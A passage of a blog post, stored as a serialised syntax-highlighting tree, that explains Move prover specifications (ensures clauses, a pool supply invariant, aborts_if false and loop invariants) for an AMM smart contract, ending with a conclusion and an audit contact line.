share",{"type":26,"tag":137,"props":10667,"children":10668},{"style":5590},[10669],{"type":32,"value":5593},{"type":26,"tag":137,"props":10671,"children":10672},{"style":5682},[10673],{"type":32,"value":10674}," add_liquidity",{"type":26,"tag":137,"props":10676,"children":10677},{"style":5601},[10678],{"type":32,"value":165},{"type":26,"tag":137,"props":10680,"children":10681},{"style":5584},[10682],{"type":32,"value":10585},{"type":26,"tag":137,"props":10684,"children":10685},{"style":5601},[10686],{"type":32,"value":1108},{"type":26,"tag":137,"props":10688,"children":10689},{"style":5584},[10690],{"type":32,"value":10602},{"type":26,"tag":137,"props":10692,"children":10693},{"style":5601},[10694],{"type":32,"value":6430},{"type":26,"tag":137,"props":10696,"children":10697},{"class":5559,"line":5642},[10698,10703,10707,10712],{"type":26,"tag":137,"props":10699,"children":10700},{"style":5682},[10701],{"type":32,"value":10702},"      remove_liquidity",{"type":26,"tag":137,"props":10704,"children":10705},{"style":5601},[10706],{"type":32,"value":165},{"type":26,"tag":137,"props":10708,"children":10709},{"style":5584},[10710],{"type":32,"value":10711},"share",{"type":26,"tag":137,"props":10713,"children":10714},{"style":5601},[10715],{"type":32,"value":5742},{"type":26,"tag":137,"props":10717,"children":10718},{"class":5559,"line":5745},[10719],{"type":26,"tag":137,"props":10720,"children":10721},{"style":5601},[10722],{"type":32,"value":8457},{"type":26,"tag":137,"props":10724,"children":10725},{"class":5559,"line":5850},[10726,10731,10735],{"type":26,"tag":137,"props":10727,"children":10728},{"style":5584},[10729],{"type":32,"value":10730},"  spec",{"type":26,"tag":137,"props":10732,"children":10733},{"style":5584},[10734],{"type":32,"value":10576},{"type":26,"tag":137,"props":10736,"children":10737},{"style":5601},[10738],{"type":32,"value":5875},{"type":26,"tag":137,"props":10740,"children":10741},{"class":5559,"line":5878},[10742,10747,10752,10756,10761],{"type":26,"tag":137,"props":10743,"children":10744},{"style":5584},[10745],{"type":32,"value":10746},"      pragma",{"type":26,"tag":137,"props":10748,"children":10749},{"style":5584},[10750],{"type":32,"value":10751}," verify",{"type":26,"tag":137,"props":10753,"children":10754},{"style":5590},[10755],{"type":32,"value":289},{"type":26,"tag":137,"props":10757,"children":10758},{"style":5573},[10759],{"type":32,"value":10760},"false",{"type":26,"tag":137,"props":10762,"children":10763},{"style":5601},[10764],{"type":32,"value":5604},{"type":26,"tag":137,"props":10766,"children":10767},{"class":5559,"line":5891},[10768,10773,10778,10783,10788],{"type":26,"tag":137,"props":10769,"children":10770},{"style":5584},[10771],{"type":32,"value":10772},"      ensures",{"type":26,"tag":137,"props":10774,"children":10775},{"style":5584},[10776],{"type":32,"value":10777}," result_1",{"type":26,"tag":137,"props":10779,"children":10780},{"style":5590},[10781],{"type":32,"value":10782}," \u003C=",{"type":26,"tag":137,"props":10784,"children":10785},{"style":5584},[10786],{"type":32,"value":10787}," coin1_in",{"type":26,"tag":137,"props":10789,"children":10790},{"style":5601},[10791],{"type":32,"value":5604},{"type":26,"tag":137,"props":10793,"children":10794},{"class":5559,"line":5909},[10795,10799,10804,10808,10813],{"type":26,"tag":137,"props":10796,"children":10797},{"style":5584},[10798],{"type":32,"value":10772},{"type":26,"tag":137,"props":10800,"children":10801},{"style":5584},[10802],{"type":32,"value":10803}," result_2",{"type":26,"tag":137,"props":10805,"children":10806},{"style":5590},[10807],{"type":32,"value":10782},{"type":26,"tag":137,"props":10809,"children":10810},{"style":5584},[10811],{"type":32,"value":10812}," coin2_in",{"type":26,"tag":137,"props":10814,"children":10815},{"style":5601},[10816],{"type":32,"value":5604},{"type":26,"tag":137,"props":10818,"children":10819},{"class":5559,"line":5930},[10820],{"type":26,"tag":137,"props":10821,"children":10822},{"style":5601},[10823],{"type":32,"value":8457},{"type":26,"tag":35,"props":10825,"children":10826},{},[10827],{"type":32,"value":10828},"There's no clean way to express this with an assert because this makes an observation across two functions which are temporally separated.",{"type":26,"tag":35,"props":10830,"children":10831},{},[10832,10834,10839],{"type":32,"value":10833},"Invariant's are also extremely useful. For example, enforcing invariants about fee parameters (fee can never be greater than 100%) or pool supply makes it a ",{"type":26,"tag":762,"props":10835,"children":10836},{},[10837],{"type":32,"value":10838},"lot",{"type":32,"value":10840}," easier to reason about the protocol.",{"type":26,"tag":35,"props":10842,"children":10843},{},[10844],{"type":32,"value":10845},"For example, Ian uses invariants to clearly define core properties of his AMM state.",{"type":26,"tag":5512,"props":10847,"children":10849},{"className":5552,"code":10848,"language":5551,"meta":7,"style":7},"spec PoolState {\n    invariant supply >= MINIMUM_LIQUIDITY;\n}\n",[10850],{"type":26,"tag":130,"props":10851,"children":10852},{"__ignoreMap":7},[10853,10870,10893],{"type":26,"tag":137,"props":10854,"children":10855},{"class":5559,"line":5560},[10856,10861,10866],{"type":26,"tag":137,"props":10857,"children":10858},{"style":5584},[10859],{"type":32,"value":10860},"spec",{"type":26,"tag":137,"props":10862,"children":10863},{"style":6009},[10864],{"type":32,"value":10865}," PoolState",{"type":26,"tag":137,"props":10867,"children":10868},{"style":5601},[10869],{"type":32,"value":5875},{"type":26,"tag":137,"props":10871,"children":10872},{"class":5559,"line":5412},[10873,10878,10883,10888],{"type":26,"tag":137,"props":10874,"children":10875},{"style":5584},[10876],{"type":32,"value":10877},"    invariant",{"type":26,"tag":137,"props":10879,"children":10880},{"style":5584},[10881],{"type":32,"value":10882}," supply",{"type":26,"tag":137,"props":10884,"children":10885},{"style":5590},[10886],{"type":32,"value":10887}," >=",{"type":26,"tag":137,"props":10889,"children":10890},{"style":5601},[10891],{"type":32,"value":10892}," MINIMUM_LIQUIDITY;\n",{"type":26,"tag":137,"props":10894,"children":10895},{"class":5559,"line":5417},[10896],{"type":26,"tag":137,"props":10897,"children":10898},{"style":5601},[10899],{"type":32,"value":6507},{"type":26,"tag":35,"props":10901,"children":10902},{},[10903,10905,10911,10913,10919],{"type":32,"value":10904},"Another useful pattern for the Move prover is ",{"type":26,"tag":130,"props":10906,"children":10908},{"className":10907},[],[10909],{"type":32,"value":10910},"aborts_if",{"type":32,"value":10912},". More specifically, it can be very helpful to assert that a function never aborts, with ",{"type":26,"tag":130,"props":10914,"children":10916},{"className":10915},[],[10917],{"type":32,"value":10918},"aborts_if false",{"type":32,"value":470},{"type":26,"tag":35,"props":10921,"children":10922},{},[10923],{"type":32,"value":10924},"Although loop invariants are a bit clunky, Ian is also able to prove that a relatively nontrivial function doesn't abort.",{"type":26,"tag":5512,"props":10926,"children":10928},{"className":5552,"code":10927,"language":5551,"meta":7,"style":7},"  fun multiply_vec_by_n_coins(input: vector\u003Cu64>): vector\u003Cu128> {\n      let amounts_times_coins = vector::empty\u003Cu128>();\n      let i = 0;\n      let n_coins = vector::length(&input);\n      while ({\n          spec {\n              invariant len(amounts_times_coins) == i;\n              invariant i \u003C= n_coins;\n              invariant forall j in 0..i: amounts_times_coins[j] == input[j] * n_coins;\n          };\n          (i \u003C n_coins)\n      }) {\n          vector::push_back(\n              &mut amounts_times_coins,\n              (*vector::borrow(&input, (i as u64)) as u128) * (n_coins as u128)\n          );\n          i = i + 1;\n      };\n      spec {\n          assert i == n_coins;\n          assert len(input) == n_coins;\n      };\n      amounts_times_coins\n  }\n  spec multiply_vec_by_n_coins {\n      pragma opaque;\n      aborts_if false;\n      ensures len(result) == len(input);\n      ensures forall j in 0..len(input): result[j] == input[j] * len(input);\n  }\n",[10929],{"type":26,"tag":130,"props":10930,"children":10931},{"__ignoreMap":7},[10932,10996,11038,11061,11106,11119,11131,11170,11193,11281,11289,11314,11322,11343,11363,11463,11471,11500,11508,11520,11544,11579,11586,11594,11601,11616,11632,11650,11695,11801],{"type":26,"tag":137,"props":10933,"children":10934},{"class":5559,"line":5560},[10935,10939,10944,10948,10953,10957,10962,10966,10970,10975,10979,10983,10987,10992],{"type":26,"tag":137,"props":10936,"children":10937},{"style":5584},[10938],{"type":32,"value":9153},{"type":26,"tag":137,"props":10940,"children":10941},{"style":5682},[10942],{"type":32,"value":10943}," multiply_vec_by_n_coins",{"type":26,"tag":137,"props":10945,"children":10946},{"style":5601},[10947],{"type":32,"value":165},{"type":26,"tag":137,"props":10949,"children":10950},{"style":5584},[10951],{"type":32,"value":10952},"input",{"type":26,"tag":137,"props":10954,"children":10955},{"style":5590},[10956],{"type":32,"value":7072},{"type":26,"tag":137,"props":10958,"children":10959},{"style":5584},[10960],{"type":32,"value":10961}," vector",{"type":26,"tag":137,"props":10963,"children":10964},{"style":5601},[10965],{"type":32,"value":8391},{"type":26,"tag":137,"props":10967,"children":10968},{"style":6009},[10969],{"type":32,"value":10627},{"type":26,"tag":137,"props":10971,"children":10972},{"style":5601},[10973],{"type":32,"value":10974},">)",{"type":26,"tag":137,"props":10976,"children":10977},{"style":5590},[10978],{"type":32,"value":7072},{"type":26,"tag":137,"props":10980,"children":10981},{"style":5584},[10982],{"type":32,"value":10961},{"type":26,"tag":137,"props":10984,"children":10985},{"style":5601},[10986],{"type":32,"value":8391},{"type":26,"tag":137,"props":10988,"children":10989},{"style":6009},[10990],{"type":32,"value":10991},"u128",{"type":26,"tag":137,"props":10993,"children":10994},{"style":5601},[10995],{"type":32,"value":9865},{"type":26,"tag":137,"props":10997,"children":10998},{"class":5559,"line":5412},[10999,11003,11008,11012,11016,11020,11025,11029,11033],{"type":26,"tag":137,"props":11000,"children":11001},{"style":5573},[11002],{"type":32,"value":10660},{"type":26,"tag":137,"props":11004,"children":11005},{"style":5584},[11006],{"type":32,"value":11007}," amounts_times_coins",{"type":26,"tag":137,"props":11009,"children":11010},{"style":5590},[11011],{"type":32,"value":5593},{"type":26,"tag":137,"props":11013,"children":11014},{"style":5601},[11015],{"type":32,"value":10961},{"type":26,"tag":137,"props":11017,"children":11018},{"style":5590},[11019],{"type":32,"value":6072},{"type":26,"tag":137,"props":11021,"children":11022},{"style":5584},[11023],{"type":32,"value":11024},"empty",{"type":26,"tag":137,"props":11026,"children":11027},{"style":5601},[11028],{"type":32,"value":8391},{"type":26,"tag":137,"props":11030,"children":11031},{"style":6009},[11032],{"type":32,"value":10991},{"type":26,"tag":137,"props":11034,"children":11035},{"style":5601},[11036],{"type":32,"value":11037},">();\n",{"type":26,"tag":137,"props":11039,"children":11040},{"class":5559,"line":5417},[11041,11045,11049,11053,11057],{"type":26,"tag":137,"props":11042,"children":11043},{"style":5573},[11044],{"type":32,"value":10660},{"type":26,"tag":137,"props":11046,"children":11047},{"style":5584},[11048],{"type":32,"value":5988},{"type":26,"tag":137,"props":11050,"children":11051},{"style":5590},[11052],{"type":32,"value":5593},{"type":26,"tag":137,"props":11054,"children":11055},{"style":5626},[11056],{"type":32,"value":5629},{"type":26,"tag":137,"props":11058,"children":11059},{"style":5601},[11060],{"type":32,"value":5604},{"type":26,"tag":137,"props":11062,"children":11063},{"class":5559,"line":5642},[11064,11068,11073,11077,11081,11085,11090,11094,11098,11102],{"type":26,"tag":137,"props":11065,"children":11066},{"style":5573},[11067],{"type":32,"value":10660},{"type":26,"tag":137,"props":11069,"children":11070},{"style":5584},[11071],{"type":32,"value":11072}," n_coins",{"type":26,"tag":137,"props":11074,"children":11075},{"style":5590},[11076],{"type":32,"value":5593},{"type":26,"tag":137,"props":11078,"children":11079},{"style":5601},[11080],{"type":32,"value":10961},{"type":26,"tag":137,"props":11082,"children":11083},{"style":5590},[11084],{"type":32,"value":6072},{"type":26,"tag":137,"props":11086,"children":11087},{"style":5682},[11088],{"type":32,"value":11089},"length",{"type":26,"tag":137,"props":11091,"children":11092},{"style":5601},[11093],{"type":32,"value":165},{"type":26,"tag":137,"props":11095,"children":11096},{"style":5590},[11097],{"type":32,"value":5694},{"type":26,"tag":137,"props":11099,"children":11100},{"style":5584},[11101],{"type":32,"value":10952},{"type":26,"tag":137,"props":11103,"children":11104},{"style":5601},[11105],{"type":32,"value":6430},{"type":26,"tag":137,"props":11107,"children":11108},{"class":5559,"line":5745},[11109,11114],{"type":26,"tag":137,"props":11110,"children":11111},{"style":5610},[11112],{"type":32,"value":11113},"      while",{"type":26,"tag":137,"props":11115,"children":11116},{"style":5601},[11117],{"type":32,"value":11118}," ({\n",{"type":26,"tag":137,"props":11120,"children":11121},{"class":5559,"line":5850},[11122,11127],{"type":26,"tag":137,"props":11123,"children":11124},{"style":5584},[11125],{"type":32,"value":11126},"          spec",{"type":26,"tag":137,"props":11128,"children":11129},{"style":5601},[11130],{"type":32,"value":5875},{"type":26,"tag":137,"props":11132,"children":11133},{"class":5559,"line":5878},[11134,11139,11144,11148,11153,11157,11162,11166],{"type":26,"tag":137,"props":11135,"children":11136},{"style":5584},[11137],{"type":32,"value":11138},"              invariant",{"type":26,"tag":137,"props":11140,"children":11141},{"style":5682},[11142],{"type":32,"value":11143}," len",{"type":26,"tag":137,"props":11145,"children":11146},{"style":5601},[11147],{"type":32,"value":165},{"type":26,"tag":137,"props":11149,"children":11150},{"style":5584},[11151],{"type":32,"value":11152},"amounts_times_coins",{"type":26,"tag":137,"props":11154,"children":11155},{"style":5601},[11156],{"type":32,"value":5671},{"type":26,"tag":137,"props":11158,"children":11159},{"style":5590},[11160],{"type":32,"value":11161},"==",{"type":26,"tag":137,"props":11163,"children":11164},{"style":5584},[11165],{"type":32,"value":5988},{"type":26,"tag":137,"props":11167,"children":11168},{"style":5601},[11169],{"type":32,"value":5604},{"type":26,"tag":137,"props":11171,"children":11172},{"class":5559,"line":5891},[11173,11177,11181,11185,11189],{"type":26,"tag":137,"props":11174,"children":11175},{"style":5584},[11176],{"type":32,"value":11138},{"type":26,"tag":137,"props":11178,"children":11179},{"style":5584},[11180],{"type":32,"value":5988},{"type":26,"tag":137,"props":11182,"children":11183},{"style":5590},[11184],{"type":32,"value":10782},{"type":26,"tag":137,"props":11186,"children":11187},{"style":5584},[11188],{"type":32,"value":11072},{"type":26,"tag":137,"props":11190,"children":11191},{"style":5601},[11192],{"type":32,"value":5604},{"type":26,"tag":137,"props":11194,"children":11195},{"class":5559,"line":5909},[11196,11200,11205,11210,11214,11218,11222,11226,11230,11234,11238,11243,11248,11252,11257,11261,11265,11269,11273,11277],{"type":26,"tag":137,"props":11197,"children":11198},{"style":5584},[11199],{"type":32,"value":11138},{"type":26,"tag":137,"props":11201,"children":11202},{"style":5584},[11203],{"type":32,"value":11204}," forall",{"type":26,"tag":137,"props":11206,"children":11207},{"style":5584},[11208],{"type":32,"value":11209}," j",{"type":26,"tag":137,"props":11211,"children":11212},{"style":5573},[11213],{"type":32,"value":5623},{"type":26,"tag":137,"props":11215,"children":11216},{"style":5626},[11217],{"type":32,"value":5629},{"type":26,"tag":137,"props":11219,"children":11220},{"style":5590},[11221],{"type":32,"value":5634},{"type":26,"tag":137,"props":11223,"children":11224},{"style":5584},[11225],{"type":32,"value":506},{"type":26,"tag":137,"props":11227,"children":11228},{"style":5590},[11229],{"type":32,"value":7072},{"type":26,"tag":137,"props":11231,"children":11232},{"style":5584},[11233],{"type":32,"value":11007},{"type":26,"tag":137,"props":11235,"children":11236},{"style":5601},[11237],{"type":32,"value":3016},{"type":26,"tag":137,"props":11239,"children":11240},{"style":5584},[11241],{"type":32,"value":11242},"j",{"type":26,"tag":137,"props":11244,"children":11245},{"style":5601},[11246],{"type":32,"value":11247},"] ",{"type":26,"tag":137,"props":11249,"children":11250},{"style":5590},[11251],{"type":32,"value":11161},{"type":26,"tag":137,"props":11253,"children":11254},{"style":5584},[11255],{"type":32,"value":11256}," input",{"type":26,"tag":137,"props":11258,"children":11259},{"style":5601},[11260],{"type":32,"value":3016},{"type":26,"tag":137,"props":11262,"children":11263},{"style":5584},[11264],{"type":32,"value":11242},{"type":26,"tag":137,"props":11266,"children":11267},{"style":5601},[11268],{"type":32,"value":11247},{"type":26,"tag":137,"props":11270,"children":11271},{"style":5590},[11272],{"type":32,"value":7152},{"type":26,"tag":137,"props":11274,"children":11275},{"style":5584},[11276],{"type":32,"value":11072},{"type":26,"tag":137,"props":11278,"children":11279},{"style":5601},[11280],{"type":32,"value":5604},{"type":26,"tag":137,"props":11282,"children":11283},{"class":5559,"line":5930},[11284],{"type":26,"tag":137,"props":11285,"children":11286},{"style":5601},[11287],{"type":32,"value":11288},"          };\n",{"type":26,"tag":137,"props":11290,"children":11291},{"class":5559,"line":5939},[11292,11297,11301,11306,11310],{"type":26,"tag":137,"props":11293,"children":11294},{"style":5601},[11295],{"type":32,"value":11296},"          (",{"type":26,"tag":137,"props":11298,"children":11299},{"style":5584},[11300],{"type":32,"value":506},{"type":26,"tag":137,"props":11302,"children":11303},{"style":5590},[11304],{"type":32,"value":11305}," \u003C",{"type":26,"tag":137,"props":11307,"children":11308},{"style":5584},[11309],{"type":32,"value":11072},{"type":26,"tag":137,"props":11311,"children":11312},{"style":5601},[11313],{"type":32,"value":5742},{"type":26,"tag":137,"props":11315,"children":11316},{"class":5559,"line":6191},[11317],{"type":26,"tag":137,"props":11318,"children":11319},{"style":5601},[11320],{"type":32,"value":11321},"      }) {\n",{"type":26,"tag":137,"props":11323,"children":11324},{"class":5559,"line":6208},[11325,11330,11334,11339],{"type":26,"tag":137,"props":11326,"children":11327},{"style":5601},[11328],{"type":32,"value":11329},"          vector",{"type":26,"tag":137,"props":11331,"children":11332},{"style":5590},[11333],{"type":32,"value":6072},{"type":26,"tag":137,"props":11335,"children":11336},{"style":5682},[11337],{"type":32,"value":11338},"push_back",{"type":26,"tag":137,"props":11340,"children":11341},{"style":5601},[11342],{"type":32,"value":6054},{"type":26,"tag":137,"props":11344,"children":11345},{"class":5559,"line":6225},[11346,11351,11355,11359],{"type":26,"tag":137,"props":11347,"children":11348},{"style":5590},[11349],{"type":32,"value":11350},"              &",{"type":26,"tag":137,"props":11352,"children":11353},{"style":5573},[11354],{"type":32,"value":6325},{"type":26,"tag":137,"props":11356,"children":11357},{"style":5584},[11358],{"type":32,"value":11007},{"type":26,"tag":137,"props":11360,"children":11361},{"style":5601},[11362],{"type":32,"value":6099},{"type":26,"tag":137,"props":11364,"children":11365},{"class":5559,"line":6238},[11366,11371,11375,11380,11384,11389,11393,11397,11401,11406,11410,11415,11419,11424,11429,11434,11438,11442,11446,11451,11455,11459],{"type":26,"tag":137,"props":11367,"children":11368},{"style":5601},[11369],{"type":32,"value":11370},"              (",{"type":26,"tag":137,"props":11372,"children":11373},{"style":5590},[11374],{"type":32,"value":7152},{"type":26,"tag":137,"props":11376,"children":11377},{"style":5601},[11378],{"type":32,"value":11379},"vector",{"type":26,"tag":137,"props":11381,"children":11382},{"style":5590},[11383],{"type":32,"value":6072},{"type":26,"tag":137,"props":11385,"children":11386},{"style":5682},[11387],{"type":32,"value":11388},"borrow",{"type":26,"tag":137,"props":11390,"children":11391},{"style":5601},[11392],{"type":32,"value":165},{"type":26,"tag":137,"props":11394,"children":11395},{"style":5590},[11396],{"type":32,"value":5694},{"type":26,"tag":137,"props":11398,"children":11399},{"style":5584},[11400],{"type":32,"value":10952},{"type":26,"tag":137,"props":11402,"children":11403},{"style":5601},[11404],{"type":32,"value":11405},", (",{"type":26,"tag":137,"props":11407,"children":11408},{"style":5584},[11409],{"type":32,"value":506},{"type":26,"tag":137,"props":11411,"children":11412},{"style":5573},[11413],{"type":32,"value":11414}," as",{"type":26,"tag":137,"props":11416,"children":11417},{"style":6009},[11418],{"type":32,"value":8445},{"type":26,"tag":137,"props":11420,"children":11421},{"style":5601},[11422],{"type":32,"value":11423},")) ",{"type":26,"tag":137,"props":11425,"children":11426},{"style":5573},[11427],{"type":32,"value":11428},"as",{"type":26,"tag":137,"props":11430,"children":11431},{"style":6009},[11432],{"type":32,"value":11433}," u128",{"type":26,"tag":137,"props":11435,"children":11436},{"style":5601},[11437],{"type":32,"value":5671},{"type":26,"tag":137,"props":11439,"children":11440},{"style":5590},[11441],{"type":32,"value":7152},{"type":26,"tag":137,"props":11443,"children":11444},{"style":5601},[11445],{"type":32,"value":4625},{"type":26,"tag":137,"props":11447,"children":11448},{"style":5584},[11449],{"type":32,"value":11450},"n_coins",{"type":26,"tag":137,"props":11452,"children":11453},{"style":5573},[11454],{"type":32,"value":11414},{"type":26,"tag":137,"props":11456,"children":11457},{"style":6009},[11458],{"type":32,"value":11433},{"type":26,"tag":137,"props":11460,"children":11461},{"style":5601},[11462],{"type":32,"value":5742},{"type":26,"tag":137,"props":11464,"children":11465},{"class":5559,"line":6247},[11466],{"type":26,"tag":137,"props":11467,"children":11468},{"style":5601},[11469],{"type":32,"value":11470},"          );\n",{"type":26,"tag":137,"props":11472,"children":11473},{"class":5559,"line":6270},[11474,11479,11483,11487,11492,11496],{"type":26,"tag":137,"props":11475,"children":11476},{"style":5584},[11477],{"type":32,"value":11478},"          i",{"type":26,"tag":137,"props":11480,"children":11481},{"style":5590},[11482],{"type":32,"value":5593},{"type":26,"tag":137,"props":11484,"children":11485},{"style":5584},[11486],{"type":32,"value":5988},{"type":26,"tag":137,"props":11488,"children":11489},{"style":5590},[11490],{"type":32,"value":11491}," +",{"type":26,"tag":137,"props":11493,"children":11494},{"style":5626},[11495],{"type":32,"value":7104},{"type":26,"tag":137,"props":11497,"children":11498},{"style":5601},[11499],{"type":32,"value":5604},{"type":26,"tag":137,"props":11501,"children":11502},{"class":5559,"line":6279},[11503],{"type":26,"tag":137,"props":11504,"children":11505},{"style":5601},[11506],{"type":32,"value":11507},"      };\n",{"type":26,"tag":137,"props":11509,"children":11510},{"class":5559,"line":6288},[11511,11516],{"type":26,"tag":137,"props":11512,"children":11513},{"style":5584},[11514],{"type":32,"value":11515},"      spec",{"type":26,"tag":137,"props":11517,"children":11518},{"style":5601},[11519],{"type":32,"value":5875},{"type":26,"tag":137,"props":11521,"children":11522},{"class":5559,"line":6355},[11523,11528,11532,11536,11540],{"type":26,"tag":137,"props":11524,"children":11525},{"style":5584},[11526],{"type":32,"value":11527},"          assert",{"type":26,"tag":137,"props":11529,"children":11530},{"style":5584},[11531],{"type":32,"value":5988},{"type":26,"tag":137,"props":11533,"children":11534},{"style":5590},[11535],{"type":32,"value":5866},{"type":26,"tag":137,"props":11537,"children":11538},{"style":5584},[11539],{"type":32,"value":11072},{"type":26,"tag":137,"props":11541,"children":11542},{"style":5601},[11543],{"type":32,"value":5604},{"type":26,"tag":137,"props":11545,"children":11546},{"class":5559,"line":6363},[11547,11551,11555,11559,11563,11567,11571,11575],{"type":26,"tag":137,"props":11548,"children":11549},{"style":5584},[11550],{"type":32,"value":11527},{"type":26,"tag":137,"props":11552,"children":11553},{"style":5682},[11554],{"type":32,"value":11143},{"type":26,"tag":137,"props":11556,"children":11557},{"style":5601},[11558],{"type":32,"value":165},{"type":26,"tag":137,"props":11560,"children":11561},{"style":5584},[11562],{"type":32,"value":10952},{"type":26,"tag":137,"props":11564,"children":11565},{"style":5601},[11566],{"type":32,"value":5671},{"type":26,"tag":137,"props":11568,"children":11569},{"style":5590},[11570],{"type":32,"value":11161},{"type":26,"tag":137,"props":11572,"children":11573},{"style":5584},[11574],{"type":32,"value":11072},{"type":26,"tag":137,"props":11576,"children":11577},{"style":5601},[11578],{"type":32,"value":5604},{"type":26,"tag":137,"props":11580,"children":11581},{"class":5559,"line":6393},[11582],{"type":26,"tag":137,"props":11583,"children":11584},{"style":5601},[11585],{"type":32,"value":11507},{"type":26,"tag":137,"props":11587,"children":11588},{"class":5559,"line":6401},[11589],{"type":26,"tag":137,"props":11590,"children":11591},{"style":5584},[11592],{"type":32,"value":11593},"      amounts_times_coins\n",{"type":26,"tag":137,"props":11595,"children":11596},{"class":5559,"line":6433},[11597],{"type":26,"tag":137,"props":11598,"children":11599},{"style":5601},[11600],{"type":32,"value":8457},{"type":26,"tag":137,"props":11602,"children":11603},{"class":5559,"line":6441},[11604,11608,11612],{"type":26,"tag":137,"props":11605,"children":11606},{"style":5584},[11607],{"type":32,"value":10730},{"type":26,"tag":137,"props":11609,"children":11610},{"style":5584},[11611],{"type":32,"value":10943},{"type":26,"tag":137,"props":11613,"children":11614},{"style":5601},[11615],{"type":32,"value":5875},{"type":26,"tag":137,"props":11617,"children":11618},{"class":5559,"line":6501},[11619,11623,11628],{"type":26,"tag":137,"props":11620,"children":11621},{"style":5584},[11622],{"type":32,"value":10746},{"type":26,"tag":137,"props":11624,"children":11625},{"style":5584},[11626],{"type":32,"value":11627}," opaque",{"type":26,"tag":137,"props":11629,"children":11630},{"style":5601},[11631],{"type":32,"value":5604},{"type":26,"tag":137,"props":11633,"children":11635},{"class":5559,"line":11634},27,[11636,11641,11646],{"type":26,"tag":137,"props":11637,"children":11638},{"style":5584},[11639],{"type":32,"value":11640},"      aborts_if",{"type":26,"tag":137,"props":11642,"children":11643},{"style":5573},[11644],{"type":32,"value":11645}," false",{"type":26,"tag":137,"props":11647,"children":11648},{"style":5601},[11649],{"type":32,"value":5604},{"type":26,"tag":137,"props":11651,"children":11653},{"class":5559,"line":11652},28,[11654,11658,11662,11666,11671,11675,11679,11683,11687,11691],{"type":26,"tag":137,"props":11655,"children":11656},{"style":5584},[11657],{"type":32,"value":10772},{"type":26,"tag":137,"props":11659,"children":11660},{"style":5682},[11661],{"type":32,"value":11143},{"type":26,"tag":137,"props":11663,"children":11664},{"style":5601},[11665],{"type":32,"value":165},{"type":26,"tag":137,"props":11667,"children":11668},{"style":5584},[11669],{"type":32,"value":11670},"result",{"type":26,"tag":137,"props":11672,"children":11673},{"style":5601},[11674],{"type":32,"value":5671},{"type":26,"tag":137,"props":11676,"children":11677},{"style":5590},[11678],{"type":32,"value":11161},{"type":26,"tag":137,"props":11680,"children":11681},{"style":5682},[11682],{"type":32,"value":11143},{"type":26,"tag":137,"props":11684,"children":11685},{"style":5601},[11686],{"type":32,"value":165},{"type":26,"tag":137,"props":11688,"children":11689},{"style":5584},[11690],{"type":32,"value":10952},{"type":26,"tag":137,"props":11692,"children":11693},{"style":5601},[11694],{"type":32,"value":6430},{"type":26,"tag":137,"props":11696,"children":11698},{"class":5559,"line":11697},29,[11699,11703,11707,11711,11715,11719,11723,11728,11732,11736,11740,11744,11749,11753,11757,11761,11765,11769,11773,11777,11781,11785,11789,11793,11797],{"type":26,"tag":137,"props":11700,"children":11701},{"style":5584},[11702],{"type":32,"value":10772},{"type":26,"tag":137,"props":11704,"children":11705},{"style":5584},[11706],{"type":32,"value":11204},{"type":26,"tag":137,"props":11708,"children":11709},{"style":5584},[11710],{"type":32,"value":11209},{"type":26,"tag":137,"props":11712,"children":11713},{"style":5573},[11714],{"type":32,"value":5623},{"type":26,"tag":137,"props":11716,"children":11717},{"style":5626},[11718],{"type":32,"value":5629},{"type":26,"tag":137,"props":11720,"children":11721},{"style":5590},[11722],{"type":32,"value":5634},{"type":26,"tag":137,"props":11724,"children":11725},{"style":5682},[11726],{"type":32,"value":11727},"len",{"type":26,"tag":137,"props":11729,"children":11730},{"style":5601},[11731],{"type":32,"value":165},{"type":26,"tag":137,"props":11733,"children":11734},{"style":5584},[11735],{"type":32,"value":10952},{"type":26,"tag":137,"props":11737,"children":11738},{"style":5601},[11739],{"type":32,"value":200},{"type":26,"tag":137,"props":11741,"children":11742},{"style":5590},[11743],{"type":32,"value":7072},{"type":26,"tag":137,"props":11745,"children":11746},{"style":5584},[11747],{"type":32,"value":11748}," result",{"type":26,"tag":137,"props":11750,"children":11751},{"style":5601},[11752],{"type":32,"value":3016},{"type":26,"tag":137,"props":11754,"children":11755},{"style":5584},[11756],{"type":32,"value":11242},{"type":26,"tag":137,"props":11758,"children":11759},{"style":5601},[11760],{"type":32,"value":11247},{"type":26,"tag":137,"props":11762,"children":11763},{"style":5590},[11764],{"type":32,"value":11161},{"type":26,"tag":137,"props":11766,"children":11767},{"style":5584},[11768],{"type":32,"value":11256},{"type":26,"tag":137,"props":11770,"children":11771},{"style":5601},[11772],{"type":32,"value":3016},{"type":26,"tag":137,"props":11774,"children":11775},{"style":5584},[11776],{"type":32,"value":11242},{"type":26,"tag":137,"props":11778,"children":11779},{"style":5601},[11780],{"type":32,"value":11247},{"type":26,"tag":137,"props":11782,"children":11783},{"style":5590},[11784],{"type":32,"value":7152},{"type":26,"tag":137,"props":11786,"children":11787},{"style":5682},[11788],{"type":32,"value":11143},{"type":26,"tag":137,"props":11790,"children":11791},{"style":5601},[11792],{"type":32,"value":165},{"type":26,"tag":137,"props":11794,"children":11795},{"style":5584},[11796],{"type":32,"value":10952},{"type":26,"tag":137,"props":11798,"children":11799},{"style":5601},[11800],{"type":32,"value":6430},{"type":26,"tag":137,"props":11802,"children":11804},{"class":5559,"line":11803},30,[11805],{"type":26,"tag":137,"props":11806,"children":11807},{"style":5601},[11808],{"type":32,"value":8457},{"type":26,"tag":92,"props":11810,"children":11811},{"id":7892},[11812],{"type":32,"value":7895},{"type":26,"tag":35,"props":11814,"children":11815},{},[11816],{"type":32,"value":11817},"In this post, we explored implications of Move's type system and formal verification, two powerful features of the Move language that enable safer programming languages.",{"type":26,"tag":35,"props":11819,"children":11820},{},[11821],{"type":32,"value":11822},"While Move as a language is still a language in active development, it shows some exciting features that seem allows developers to create structurally safer programs.",{"type":26,"tag":35,"props":11824,"children":11825},{},[11826,11828,11835],{"type":32,"value":11827},"We're passionate about pushing the edge of what's possible in Move security. If you have any thoughts, or would like to explore an audit, feel free to reach out to me 